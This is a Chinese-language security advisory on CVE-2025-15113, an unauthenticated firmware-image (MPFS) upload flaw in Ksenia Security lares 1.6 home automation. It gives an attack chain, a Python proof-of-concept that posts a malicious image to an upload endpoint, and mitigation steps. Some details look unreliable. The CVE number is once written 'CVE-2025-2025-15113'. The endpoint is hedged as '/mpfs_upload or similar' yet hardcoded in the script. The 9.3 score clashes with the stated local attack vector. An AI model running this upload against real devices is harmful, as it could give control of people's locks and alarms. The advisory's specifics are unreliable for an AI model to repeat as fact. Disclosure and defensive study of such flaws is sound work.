CVE-2025-15113 Ksenia Security lares家庭自动化系统未授权文件上传导致RCE漏洞

漏洞信息

漏洞编号

CVE-2025-15113

漏洞类型

未授权文件上传、远程代码执行

CVSS评分

9.3 严重

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Ksenia Security lares (legacy model) Home Automation version 1.6

漏洞概述

CVE-2025-2025-15113是Ksenia Security lares legacy系列家庭自动化系统中的一个严重安全漏洞。该漏洞存在于系统的Web管理界面，由于缺乏适当的访问控制和输入验证，攻击者可以通过未受保护的端点上传恶意的MPFS（Microchip PICtail Plus Flash）文件系统二进制镜像文件。MPFS是Microchip微控制器常用的文件系统格式，攻击者精心构造的恶意MPFS镜像可以覆盖设备闪存中的程序存储区域，从而实现任意代码执行。由于该系统的Web服务器直接运行在家庭自动化控制设备上，成功利用此漏洞可使攻击者完全控制整个智能家居系统，包括门锁、报警系统、监控设备等关键设施。CVSS 3.1评分高达9.3分，属于严重级别漏洞。

技术细节

该漏洞的技术根源在于Ksenia Security lares家庭自动化系统的固件更新机制存在严重设计缺陷。系统提供了一个用于更新MPFS文件系统镜像的Web端点，但该端点缺少必要的身份验证和权限检查机制。攻击者可以直接向该端点发送HTTP POST请求，上传精心构造的MPFS二进制文件。由于系统直接将接收到的二进制数据写入闪存而未进行完整性校验或签名验证，恶意构造的镜像可以包含可执行的代码或修改后的程序逻辑。当设备重启或系统重新加载文件系统时，恶意代码将被执行，从而在Web服务器进程中获得代码执行权限。由于系统以高权限运行，攻击者可以进一步实现持久化控制、横向移动或完全接管整个家庭自动化网络。攻击者需要能够访问目标设备的本地网络（AV:L），但不需要任何认证凭据（PR:N）。

攻击链分析

STEP 1

步骤1

信息收集：攻击者对目标网络进行扫描，识别运行Ksenia Security lares家庭自动化系统的设备，并确定其IP地址和Web管理界面端口

STEP 2

步骤2

访问未受保护的端点：攻击者直接访问设备的/mpfs_upload或类似上传端点，该端点缺少身份验证机制

STEP 3

步骤3

构造恶意MPFS镜像：攻击者创建包含恶意代码的MPFS文件系统二进制镜像，该镜像可覆盖闪存中的程序存储区域

STEP 4

步骤4

上传恶意文件：通过HTTP POST请求将恶意MPFS文件上传到目标设备，系统直接将其写入闪存而未进行安全校验

STEP 5

步骤5

触发代码执行：设备重启或重新加载文件系统时，恶意代码被执行，攻击者获得Web服务器的代码执行权限

STEP 6

步骤6

持久化控制：攻击者在系统中建立后门，实现长期控制整个家庭自动化网络，包括门锁、报警系统、监控设备等

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-15113 PoC - Ksenia Security lares MPFS Upload RCE
# Target: Ksenia Security lares (legacy model) Home Automation

def exploit_mpfs_upload(target_ip, malicious_mpfs_file):
    """
    Exploit the unprotected MPFS upload endpoint
    """
    upload_url = f"http://{target_ip}/mpfs_upload"
    
    try:
        with open(malicious_mpfs_file, 'rb') as f:
            mpfs_data = f.read()
        
        files = {'mpfs_image': ('exploit.mpfs', mpfs_data, 'application/octet-stream')}
        
        print(f"[*] Uploading malicious MPFS to {target_ip}...")
        response = requests.post(upload_url, files=files, timeout=30)
        
        if response.status_code == 200:
            print("[+] MPFS upload successful!")
            print("[*] Device will now load the malicious filesystem...")
            print("[*] Reboot device to trigger payload execution")
            return True
        else:
            print(f"[-] Upload failed with status: {response.status_code}")
            return False
            
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print(f"Usage: python {sys.argv[0]} <target_ip> <malicious_mpfs_file>")
        sys.exit(1)
    
    target = sys.argv[1]
    mpfs_file = sys.argv[2]
    exploit_mpfs_upload(target, mpfs_file)

影响范围

Ksenia Security lares (legacy model) Home Automation version 1.6

所有未修补的legacy系列固件版本

防御指南

临时缓解措施

立即将Ksenia Security lares设备从公网或不受信任的网络中隔离，启用设备的本地访问控制列表（ACL），限制只有授权的管理员终端可以访问Web管理界面。同时联系厂商获取安全更新，在测试环境中验证后尽快部署补丁。在无法立即打补丁的情况下，可考虑使用防火墙规则限制对设备Web端口的访问，仅允许来自可信管理网段的连接。